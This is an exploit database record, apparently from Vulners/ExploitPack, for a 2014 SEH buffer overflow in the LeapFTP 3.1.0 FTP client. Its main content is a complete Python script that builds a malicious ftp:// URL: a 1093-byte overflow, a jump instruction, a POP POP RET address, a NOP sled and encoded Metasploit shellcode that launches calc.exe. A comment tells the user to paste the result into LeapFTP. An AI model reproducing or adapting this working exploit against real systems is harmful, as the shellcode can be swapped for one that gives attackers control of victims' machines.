Description
# Exploit Title: LeapFTP 3.1.0 URL Handling SEH Exploit
# Google Dork: "k3170makan is totally awesome" hehehe
# Date: 2014-08-28
# Exploit Author: k3170makan
# Vendor Homepage: http://www.leapware.com/
# Software Link: http://www.leapware.com/download.html
# Version: 3.1.0
# Tested on: Windows XP SP0 (DoS on Windows SP2, Windows 7)
{"lastseen": "2020-04-01T19:04:25", "references": [], "description": "\n# Exploit Title: LeapFTP 3.1.0 URL Handling SEH Exploit\n# Google Dork: \"k3170makan is totally awesome\" hehehe\n# Date: 2014-08-28\n# Exploit Author: k3170makan\n# Vendor Homepage: http://www.leapware.com/\n# Software Link: http://www.leapware.com/download.html\n# Version: 3.1.0\n# Tested on: Windows XP SP0 (DoS on Windows SP2, Windows 7)", "edition": 1, "reporter": "k3170makan", "exploitpack": {"type": "local", "platform": "windows"}, "published": "2015-01-04T16:17:41", "title": "LeapFTP-3.1.0-URL-Handling", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": -0.3, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.3}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2015-01-04T16:17:41", "id": "EXPLOITPACK:4C841902BBB70EBE5758529014DE33F2", "href": "", "viewCount": 1, "sourceData": "from sys import argv\nif __name__ == \"__main__\":\novTrigger = 1093\nf = open(\"exploit.txt\",\"w\")\nf.write(\"ftp://\")\nf.write(\"A\"*ovTrigger)\nf.write(\"\\xEB\\x06\\x90\\x90\") #JMP to payload\nf.write(\"\\x44\\xD3\\x4A\\x77\") #POP POP RET\nf.write(\"\\x90\"*30)\n#msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/alpha_mixed -c 1\n-b \\x00\\x0a\\x0d\\xff\nshellcode = \"\\x89\\xe0\\xd9\\xe8\\xd9\\x70\\xf4\\x5f\\x57\\x59\\x49\\x49\\x49\\x49\" +\\\n\"\\x49\\x49\\x49\\x49\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51\" +\\\n\"\\x5a\\x6a\\x41\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\" +\\\n\"\\x41\\x42\\x32\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\" +\\\n\"\\x42\\x75\\x4a\\x49\\x49\\x6c\\x68\\x68\\x4f\\x79\\x35\\x50\\x53\\x30\" +\\\n\"\\x45\\x50\\x35\\x30\\x6e\\x69\\x79\\x75\\x30\\x31\\x6a\\x72\\x30\\x64\" +\\\n\"\\x4c\\x4b\\x53\\x62\\x56\\x50\\x4e\\x6b\\x76\\x32\\x56\\x6c\\x6c\\x4b\" +\\\n\"\\x42\\x72\\x62\\x34\\x6e\\x6b\\x54\\x32\\x46\\x48\\x76\\x6f\\x6e\\x57\" +\\\n\"\\x61\\x5a\\x67\\x56\\x45\\x61\\x39\\x6f\\x64\\x71\\x4b\\x70\\x4e\\x4c\" +\\\n\"\\x55\\x6c\\x53\\x51\\x33\\x4c\\x67\\x72\\x76\\x4c\\x51\\x30\\x59\\x51\" +\\\n\"\\x38\\x4f\\x64\\x4d\\x45\\x51\\x49\\x57\\x4d\\x32\\x58\\x70\\x56\\x32\" +\\\n\"\\x70\\x57\\x4e\\x6b\\x31\\x42\\x76\\x70\\x4e\\x6b\\x61\\x52\\x47\\x4c\" +\\\n\"\\x73\\x31\\x5a\\x70\\x4c\\x4b\\x57\\x30\\x53\\x48\\x6c\\x45\\x4f\\x30\" +\\\n\"\\x33\\x44\\x51\\x5a\\x65\\x51\\x48\\x50\\x42\\x70\\x6e\\x6b\\x72\\x68\" +\\\n\"\\x67\\x68\\x6c\\x4b\\x30\\x58\\x47\\x50\\x77\\x71\\x5a\\x73\\x49\\x73\" +\\\n\"\\x77\\x4c\\x71\\x59\\x6e\\x6b\\x35\\x64\\x4e\\x6b\\x57\\x71\\x4b\\x66\" +\\\n\"\\x35\\x61\\x4b\\x4f\\x34\\x71\\x4f\\x30\\x4e\\x4c\\x59\\x51\\x4a\\x6f\" +\\\n\"\\x74\\x4d\\x75\\x51\\x58\\x47\\x44\\x78\\x59\\x70\\x62\\x55\\x68\\x74\" +\\\n\"\\x33\\x33\\x61\\x6d\\x4b\\x48\\x65\\x6b\\x33\\x4d\\x47\\x54\\x72\\x55\" +\\\n\"\\x58\\x62\\x36\\x38\\x6e\\x6b\\x32\\x78\\x35\\x74\\x55\\x51\\x4a\\x73\" +\\\n\"\\x73\\x56\\x4e\\x6b\\x66\\x6c\\x72\\x6b\\x6e\\x6b\\x71\\x48\\x77\\x6c\" +\\\n\"\\x47\\x71\\x78\\x53\\x6e\\x6b\\x73\\x34\\x4e\\x6b\\x75\\x51\\x5a\\x70\" +\\\n\"\\x4b\\x39\\x77\\x34\\x35\\x74\\x71\\x34\\x31\\x4b\\x51\\x4b\\x75\\x31\" +\\\n\"\\x71\\x49\\x70\\x5a\\x66\\x31\\x4b\\x4f\\x39\\x70\\x43\\x68\\x43\\x6f\" +\\\n\"\\x53\\x6a\\x4c\\x4b\\x42\\x32\\x38\\x6b\\x4b\\x36\\x53\\x6d\\x42\\x4a\" +\\\n\"\\x36\\x61\\x4c\\x4d\\x4b\\x35\\x68\\x39\\x65\\x50\\x35\\x50\\x55\\x50\" +\\\n\"\\x70\\x50\\x52\\x48\\x76\\x51\\x6c\\x4b\\x62\\x4f\\x6c\\x47\\x79\\x6f\" +\\\n\"\\x6e\\x35\\x6f\\x4b\\x4a\\x50\\x4e\\x55\\x69\\x32\\x32\\x76\\x55\\x38\" +\\\n\"\\x79\\x36\\x6c\\x55\\x6f\\x4d\\x4d\\x4d\\x6b\\x4f\\x78\\x55\\x75\\x6c\" +\\\n\"\\x73\\x36\\x31\\x6c\\x57\\x7a\\x4b\\x30\\x79\\x6b\\x49\\x70\\x70\\x75\" +\\\n\"\\x64\\x45\\x4f\\x4b\\x63\\x77\\x37\\x63\\x62\\x52\\x52\\x4f\\x52\\x4a\" +\\\n\"\\x77\\x70\\x56\\x33\\x69\\x6f\\x4e\\x35\\x30\\x63\\x35\\x31\\x50\\x6c\" +\\\n\"\\x51\\x73\\x36\\x4e\\x45\\x35\\x44\\x38\\x33\\x55\\x53\\x30\\x41\\x41\"\nf.write(shellcode)\nf.flush()\nf.close()\n#copy contents of exploit.txt to your clipboard and then launch LeapFTP\n <http://about.me/k3170makan>\nKeith Makan <http://about.me/k3170makan>\nabout.me/k3170makan\n <http://about.me/k3170makan>\n", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645477240}}
{}
LeapFTP-3.1.0-URL-Handling